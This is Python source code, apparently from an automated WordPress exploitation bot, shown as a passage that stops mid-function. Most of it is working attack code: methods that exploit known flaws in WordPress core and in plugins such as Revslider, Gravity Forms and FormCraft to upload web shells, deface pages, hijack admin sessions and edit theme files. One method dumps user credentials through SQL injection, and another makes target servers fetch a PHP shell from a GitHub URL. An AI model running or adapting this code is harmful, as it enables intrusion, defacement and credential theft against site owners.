def wp_content_injection(self, site):
try:
zaq = self.GetWordpressPostId(site)
headers = {'Content-Type': 'application/json'}
xxx = str(zaq) + 'bbx'
data = json.dumps({
'content': '<h1>Vuln!! Path it now!!\n<p><title>Vuln!! Path it now!!<br />\n</title></p></h1>\n',
'title': 'Vuln!! Path it now!!',
'id': xxx,
'link': '/x-htm/',
'slug': '"/x-htm/"'
})
GoT = requests.post('http://' + site + '/wp-json/wp/v2/posts/' + str(zaq), data=data, headers=headers, timeout=10)
if GoT:
CheckIndex = 'http://' + site + '/x.htm'
zcheck = requests.get(CheckIndex, timeout=10)
if 'Vuln!!' in zcheck.text:
self.Print_Vuln_index(site + '/x.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/x.htm' + '\n')
else:
self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
else:
self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
except:
self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
def Wp_Job_Manager(self, site):
try:
Exploit = '/jm-ajax/upload_file/'
CheckVuln = requests.get('http://' + site + Exploit, timeout=5)
if '"files":[]' in CheckVuln.text.encode('utf-8'):
try:
IndeXfile = {'file[]': open(self.Jce_Deface_image, 'rb')}
GoT = requests.post('http://' + site + Exploit, files=IndeXfile, timeout=5)
GetIndeXpath = re.findall('"url":"(.*)"', GoT.text.encode('utf-8'))
IndeXpath = GetIndeXpath[0].split('"')[0].replace('\/', '/').split('/wp-content')[1]
UploadedIndEX = site + '/wp-content' + IndeXpath
Checkindex = requests.get('http://' + UploadedIndEX, timeout=5)
if 'GIF89a' in Checkindex.text.encode('utf-8'):
self.Print_Vuln_index(UploadedIndEX)
with open('result/Index_results.txt', 'a') as writer:
writer.write(UploadedIndEX + '\n')
else:
self.Print_NotVuln('Wp-Job-Manager', site)
except:
self.Print_NotVuln('Wp-Job-Manager', site)
else:
self.Print_NotVuln('Wp-Job-Manager', site)
except:
self.Print_NotVuln('Wp-Job-Manager', site)
def wp_mobile_detector(self, site):
try:
ExploitShell = '/wp-content/plugins/wp-mobile-detector/resize.php?src=' \
'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/settings_auto.php'
ExploitGifUpload = '/wp-content/plugins/wp-mobile-detector/resize.php?src=' \
'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/pwn.gif'
Ex = '/wp-content/plugins/wp-mobile-detector/resize.php'
GoT = requests.get('http://' + site + Ex, timeout=5)
if 'GIF89a' in GoT.text.encode('utf-8'):
requests.get('http://' + site + ExploitGifUpload)
requests.get('http://' + site + ExploitShell)
PathGif = '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif'
PathShell = '/wp-content/plugins/wp-mobile-detector/cache/settings_auto.php'
Check1 = 'http://' + site + PathGif
Check2 = 'http://' + site + PathShell
CheckIndex = requests.get(Check1, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
CheckShell = requests.get(Check2, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
Xshell = requests.get("http://" + site + "/wp-content/vuln.php", timeout=5)
if 'Vuln!!' in Xshell.text.encode('utf-8'):
self.Print_vuln_Shell(site + "/wp-content/vuln.php")
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + "/wp-content/vuln.php" + '\n')
Xindex = requests.get("http://" + site + "/vuln.htm", timeout=5)
if 'Vuln!!' in Xindex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_Vuln_index(site + '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif' + '\n')
else:
self.Print_NotVuln('wp-mobile-detector', site)
else:
self.Print_NotVuln('wp-mobile-detector', site)
except:
self.Print_NotVuln('wp-mobile-detector', site)
def get_WpNoncE(self, source):
try:
find = re.findall('<input type="hidden" id="_wpnonce" name="_wpnonce" value="(.*?)"', source)
path = find[0].strip()
return path
except:
pass
def get_WpFlag(self, source):
try:
find = re.findall('<option value="(.*?)" selected="selected">', source)
path = find[0].strip()
return path
except:
pass
def UserProExploit(self, site):
try:
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
'Accept': '*/*'}
exploit = '/?up_auto_log=true'
sess = requests.session()
admin_re_page = 'http://' + site + '/wp-admin/'
sess.get('http://' + site + exploit, timeout=10, headers=headers)
Check_login = sess.get(admin_re_page, timeout=10, headers=headers)
if '<li id="wp-admin-bar-logout">' in Check_login.text:
with open('result/AdminTakeover_results.txt', 'a') as writer:
writer.write(site + exploit + '\n')
___Get_editor = admin_re_page + 'theme-editor.php?file=search.php#template'
___Get_edit = admin_re_page + 'theme-editor.php'
Get_source = sess.get(___Get_editor, headers=headers, timeout=5)
source = Get_source.text
_Wp_FlaG = self.get_WpFlag(source)
_Wp_NoncE = self.get_WpNoncE(source)
__data = {'_wpnonce': _Wp_NoncE,
'_wp_http_referer': '/wp-admin/theme-editor.php?file=search.php',
'newcontent': self.shell_code,
'action': 'update',
'file': 'search.php',
'theme': _Wp_FlaG,
'scrollto': '0',
'docs-list': '',
'submit': 'Update+File'}
sess.post(___Get_edit, data=__data, headers=headers)
shell_PaTh = 'http://' + site + "/wp-content/themes/" + _Wp_FlaG + "/search.php"
Check_sHell = sess.get(shell_PaTh, headers=headers)
if 'wordpress_project' in Check_sHell.text:
__po = {'_upl': 'Upload'}
fil = {'file': open('Access.php', 'rb')}
requests.post(shell_PaTh, data=__po, files=fil)
shell_PaTh_DoNe = 'http://' + site + "/wp-content/themes/" + _Wp_FlaG + '/Access.php'
Got_Shell = requests.get(shell_PaTh_DoNe, timeout=5)
if 'b374k' in Got_Shell.text:
self.Print_vuln_Shell(site + "/wp-content/themes/" + _Wp_FlaG + "/Access.php")
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + "/wp-content/themes/" + _Wp_FlaG + "/Access.php" + '\n')
else:
self.Print_vuln_Shell(site + "/wp-content/themes/" + _Wp_FlaG + "/search.php")
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + "/wp-content/themes/" + _Wp_FlaG + "/search.php" + '\n')
else:
self.Print_NotVuln('UserPro', site)
else:
self.Print_NotVuln('UserPro', site)
except:
self.Print_NotVuln('UserPro', site)
def formcraftExploit_Shell(self, site):
try:
ShellFile = {'files[]': open(self.pagelinesExploitShell, 'rb')}
Exp = 'http://' + site + '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'
Check = requests.get(Exp, timeout=5)
if '"failed"' in Check.text.encode('utf-8'):
GoT = requests.post(Exp, files=ShellFile, timeout=5)
if 'new_name' in GoT.text.encode('utf-8'):
GetIndexName = re.findall('"new_name":"(.*)",', GoT.text.encode('utf-8'))
IndexPath = site + '/wp-content/plugins/formcraft/file-upload/server/content/files/'\
+ GetIndexName[0].split('"')[0]
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if CheckIndex.status_code == 200:
CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.formcraftExploitIndeX(site)
else:
self.formcraftExploitIndeX(site)
else:
self.formcraftExploitIndeX(site)
else:
self.formcraftExploitIndeX(site)
except:
self.formcraftExploitIndeX(site)
def formcraftExploitIndeX(self, site):
try:
ShellFile = {'files[]': open(self.Jce_Deface_image, 'rb')}
Exp = 'http://' + site + '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'
Check = requests.get(Exp, timeout=5)
if '"failed"' in Check.text.encode('utf-8'):
GoT = requests.post(Exp, files=ShellFile, timeout=5)
if 'new_name' in GoT.text.encode('utf-8'):
GetIndexName = re.findall('"new_name":"(.*)",', GoT.text.encode('utf-8'))
IndexPath = site + '/wp-content/plugins/formcraft/file-upload/server/content/files/'\
+ GetIndexName[0].split('"')[0]
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
else:
self.Print_NotVuln('formcraft', site)
else:
self.Print_NotVuln('formcraft', site)
else:
self.Print_NotVuln('formcraft', site)
except:
self.Print_NotVuln('formcraft', site)
def cherry_plugin(self, site):
try:
ShellFile = {'file': (self.pagelinesExploitShell, open(self.pagelinesExploitShell, 'rb')
, 'multipart/form-data')}
Exp = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/upload.php'
aa = requests.post(Exp, files=ShellFile, timeout=5)
Shell = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/' \
+ self.pagelinesExploitShell.split('/')[1]
GoT = requests.get(Shell, timeout=5)
if GoT.status_code == 200:
CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_NotVuln('cherry plugin', site)
else:
self.Print_NotVuln('cherry plugin', site)
except:
self.Print_NotVuln('cherry plugin', site)
def addblockblocker(self, site):
try:
ShellFile = {'popimg': open(self.pagelinesExploitShell, 'rb')}
Exp = 'http://' + site + '/wp-admin/admin-ajax.php?action=getcountryuser&cs=2'
requests.post(Exp, files=ShellFile, timeout=5)
CheckShell = 'http://' + site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/' \
+ self.pagelinesExploitShell.split('/')[1]
GoT = requests.get(CheckShell, timeout=5)
if GoT.status_code == 200:
CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_NotVuln('Adblock Blocker', site)
else:
self.Print_NotVuln('Adblock Blocker', site)
except:
self.Print_NotVuln('Adblock Blocker', site)
def HeadWayThemeExploit(self, site):
try:
CheckTheme = requests.get('http://' + site, timeout=5)
if '/wp-content/themes/headway' in CheckTheme.text.encode('utf-8'):
ThemePath = re.findall('/wp-content/themes/(.*)/style.css', CheckTheme.text.encode('utf-8'))
ShellFile = {'Filedata': open(self.pagelinesExploitShell, 'rb')}
useragent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
url = "http://" + site + "/wp-content/themes/" + ThemePath[0] +\
"/library/visual-editor/lib/upload-header.php"
Check = requests.get(url, timeout=5)
if Check.status_code == 200:
GoT = requests.post(url, files=ShellFile, headers=useragent)
if GoT.status_code == 200:
Shell_URL = 'http://' + site + '/wp-content/uploads/headway/header-uploads/' +\
self.pagelinesExploitShell.split('/')[1]
requests.get(Shell_URL, timeout=5)
CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_NotVuln('Headway Theme', site)
else:
self.Print_NotVuln('Headway Theme', site)
else:
self.Print_NotVuln('Headway Theme', site)
else:
self.Print_NotVuln('Headway Theme', site)
except:
self.Print_NotVuln('Headway Theme', site)
def pagelinesExploit(self, site):
try:
FileShell = {'file': open(self.pagelinesExploitShell, 'rb')}
PostData = {'settings_upload': "settings", 'page': "pagelines"}
Useragent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
url = "http://" + site + "/wp-admin/admin-post.php"
GoT = requests.post(url, files=FileShell, data=PostData, headers=Useragent, timeout=5)
if GoT.status_code == 200:
CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_NotVuln('Pagelines', site)
else:
self.Print_NotVuln('Pagelines', site)
except:
self.Print_NotVuln('Pagelines', site)
def wysijaExploit(self, site):
try:
FileShell = {'my-theme': open(self.MailPoetZipShell, 'rb')}
PostData = {'action': "themeupload", 'submitter': "Upload", 'overwriteexistingtheme': "on",
'page': 'GZNeFLoZAb'}
UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
url = "http://" + site + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
GoT = requests.post(url, files=FileShell, data=PostData, headers=UserAgent, timeout=10)
if 'page=wysija_campaigns&action=themes&reload=1' in GoT.text.encode('utf-8'):
sh = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/vuln.php'
index = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/pwn.gif'
CheckShell = requests.get(sh, timeout=5)
CheckIndex = requests.get(index, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/uploads/wysija/themes/rock/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/uploads/wysija/themes/rock/vuln.php' + '\n')
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif' + '\n')
else:
self.Print_NotVuln('wysija', site)
else:
self.Print_NotVuln('wysija', site)
except:
self.Print_NotVuln('wysija', site)
def HD_WebPlayerSqli(self, site):
try:
check = requests.get('http://' + site + '/wp-content/plugins/hd-webplayer/playlist.php', timeout=5)
if '<?xml version="' in check.text.encode('utf-8'):
Exploit = '/wp-content/plugins/hd-webplayer/playlist.php' \
'?videoid=1+union+select+1,2,concat(user_login,0x3a,user_pass)' \
',4,5,6,7,8,9,10,11+from+wp_users--'
GoT = requests.get('http://' + site + Exploit, timeout=5)
User_Pass = re.findall('<title>(.*)</title>', GoT.text.encode('utf-8'))
username = User_Pass[1].split(':')[0]
password = User_Pass[1].split(':')[1]
self.Print_Vuln('HD-Webplayer', site)
self.Print_Username_Password(username, password)
with open('result/Sqli_result.txt', 'a') as writer:
writer.write('------------------------------' + '\n' + 'Domain: ' + site + '\n' +
'Username : ' + username + '\n' + 'Password : ' + password + '\n')
else:
self.Print_NotVuln('HD-Webplayer', site)
except:
self.Print_NotVuln('HD-Webplayer', site)
def Gravity_Forms_Shell(self, site):
try:
Grav_checker = requests.get('http://' + site + '/?gf_page=upload', timeout=5)
if '"status" : "error"' in Grav_checker.text.encode('utf-8'):
UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
fileDeface = {'file': open(self.gravShell, 'rb')}
post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'css.php5'}
try:
url = "http://" + site + '/?gf_page=upload'
GoT = requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5)
if '.php5' in GoT.text.encode('utf-8'):
CheckShell = requests.get('http://' + site + '/wp-content/_input_3_css.php5', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
Checkshell2 = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
if 'Vuln!!' in Checkshell2.text.encode('utf-8'):
Checkshell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Gravity_forms_Index(site)
else:
self.Gravity_forms_Index(site)
else:
self.Gravity_forms_Index(site)
else:
self.Gravity_forms_Index(site)
except Exception, e:
self.Print_NotVuln('Gravity-Forms', site)
else:
self.Print_NotVuln('Gravity Forms', site)
except:
self.Timeout(site)
def Gravity_forms_Index(self, site):
UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
fileDeface = {'file': open(self.Jce_Deface_image, 'rb')}
post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'pwn.gif'}
post_data2 = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../../', 'name': 'pwn.gif'}
try:
url = "http://" + site + '/?gf_page=upload'
requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5)
requests.post(url, files=fileDeface, data=post_data2, headers=UserAgent, timeout=5)
CheckIndex = requests.get('http://' + site + '/_input_3_pwn.gif', timeout=5)
CheckIndex2 = requests.get('http://' + site + '/wp-content/_input_3_pwn.gif', timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/_input_3_pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/_input_3_pwn.gif' + '\n')
elif 'GIF89a' in CheckIndex2.text.encode('utf-8'):
self.Print_Vuln_index(site + '/wp-content/_input_3_pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/_input_3_pwn.gif' + '\n')
else:
self.Print_NotVuln('Gravity-Forms', site)
except Exception, e:
self.Print_NotVuln('Gravity-Forms', site)
def WP_User_Frontend(self, site):
try:
CheckVuln = requests.get('http://' + site + '/wp-admin/admin-ajax.php?action=wpuf_file_upload', timeout=5)
if 'error' in CheckVuln.text or CheckVuln.status_code == 200:
post = {}
UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
post['action'] = 'wpuf_file_upload'
files = {'wpuf_file': open(self.Jce_Deface_image, 'rb')}
try:
_url = 'http://' + site + "/wp-admin/admin-ajax.php"
_open = requests.post(_url, files=files, data=post, headers=UserAgent, timeout=10)
if 'image][]' in _open.text.encode('utf-8'):
_Def = site + "/wp-content/uploads/20" + self.year + "/" + self.month + "/" + self.Jce_Deface_image.split('/')[1]
Check_Deface = requests.get('http://' + _Def, timeout=5)
if 'GIF89a' in Check_Deface.text.encode('utf-8'):
self.Print_Vuln_index(_Def)
with open('result/Index_results.txt', 'a') as writer:
writer.write(_Def + '\n')
else:
self.Print_NotVuln('WP-User-Frontend', site)
else:
self.Print_NotVuln('WP-User-Frontend', site)
except:
self.Print_NotVuln('WP-User-Frontend', site)
else:
self.Print_NotVuln('WP-User-Frontend', site)
except:
self.Print_NotVuln('WP-User-Frontend', site)
def Revslider_css(self, site):
IndeXText = 'Vuln!! Patch it Now!'
ency = {'action': "revslider_ajax_action",
'client_action': "update_captions_css",
'data': "<body style='color: transparent;background-color: black'><center><h1>"
"<b style='color: white'>" + IndeXText + "<p style='color: transparent'>",
}
try:
url = "http://" + site + "/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"
aa = requests.post(url, data=ency, timeout=5)
if 'succesfully' in aa.text.encode('utf-8'):
deface = site + '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css'
self.Print_Vuln_index(deface)
with open('result/Index_results.txt', 'a') as writer:
writer.write(deface + '\n')
else:
self.Print_NotVuln('Revslider', site)
except:
self.Print_NotVuln('Revslider', site)
def Revslider_SHELL(self, site):
try:
UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
Exploit = 'http://' + site + '/wp-admin/admin-ajax.php'
data = {'action': "revslider_ajax_action", 'client_action': "update_plugin"}
FileShell = {'update_file': open(self.MailPoetZipShell, 'rb')}
CheckRevslider = requests.get('http://' + site, timeout=5)
if '/wp-content/plugins/revslider/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev = requests.get('http://' + site +
'/wp-content/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(site + '/wp-content/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/Avada/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev1 = requests.get('http://' + site +
'/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev1.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/striking_r/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev2 = requests.get('http://' + site +
'/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev2.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/IncredibleWP/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev3 = requests.get('http://' + site +
'/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev3.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/ultimatum/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev4 = requests.get('http://' + site +
'/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev4.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/medicate/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev5 = requests.get('http://' + site +
'/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev5.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/centum/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev6 = requests.get('http://' + site +
'/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev6.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/centum/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(site + '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/beach_apollo/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev7 = requests.get('http://' + site +
